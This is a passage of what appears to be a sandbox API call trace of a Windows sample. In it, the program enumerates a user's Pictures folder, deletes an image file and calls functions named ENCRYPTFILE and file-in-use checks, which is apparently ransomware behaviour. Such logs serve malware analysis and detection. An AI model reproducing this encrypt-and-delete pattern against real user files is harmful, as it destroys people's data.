returned 1 [0094.036] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg", lpFilePart=0x0) returned 0x2d [0094.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0094.044] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\fgq5ew8t8.jpg")) returned 0x20 [0094.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0094.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0094.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0094.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0094.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0094.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0094.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0094.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0094.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0094.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.161] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3fff20, ftCreationTime.dwHighDateTime=0x1d5f02d, ftLastAccessTime.dwLowDateTime=0x3197eae0, ftLastAccessTime.dwHighDateTime=0x1d5ee7d, ftLastWriteTime.dwLowDateTime=0x3197eae0, ftLastWriteTime.dwHighDateTime=0x1d5ee7d, nFileSizeHigh=0x0, nFileSizeLow=0x244f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fgq5EW8t8.jpg", cAlternateFileName="FGQ5EW~1.JPG")) returned 0x41ac280 [0094.161] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\fgq5ew8t8.jpg")) returned 1 [0094.208] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3fff20, ftCreationTime.dwHighDateTime=0x1d5f02d, ftLastAccessTime.dwLowDateTime=0x3197eae0, ftLastAccessTime.dwHighDateTime=0x1d5ee7d, ftLastWriteTime.dwLowDateTime=0x3197eae0, ftLastWriteTime.dwHighDateTime=0x1d5ee7d, nFileSizeHigh=0x0, nFileSizeLow=0x244f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fgq5EW8t8.jpg", cAlternateFileName="FGQ5EW~1.JPG")) returned 0 [0094.208] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.209] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0094.209] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.210] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.210] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.210] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0094.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f98 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0094.211] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0094.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.212] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.212] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51874400, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0x470c54d0, ftLastAccessTime.dwHighDateTime=0x1d5e8db, ftLastWriteTime.dwLowDateTime=0x470c54d0, ftLastWriteTime.dwHighDateTime=0x1d5e8db, nFileSizeHigh=0x0, nFileSizeLow=0x541d, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="J06YyOv018ZbSPW7yM.png", cAlternateFileName="J06YYO~1.PNG")) returned 0x41ac440 [0094.212] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0094.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0094.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0094.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.213] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0094.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0094.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0094.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.213] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.214] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0094.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0094.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0094.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0094.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e90 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0094.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0094.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0094.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0094.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0094.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0094.217] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0094.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.217] RtlAllocateHeap 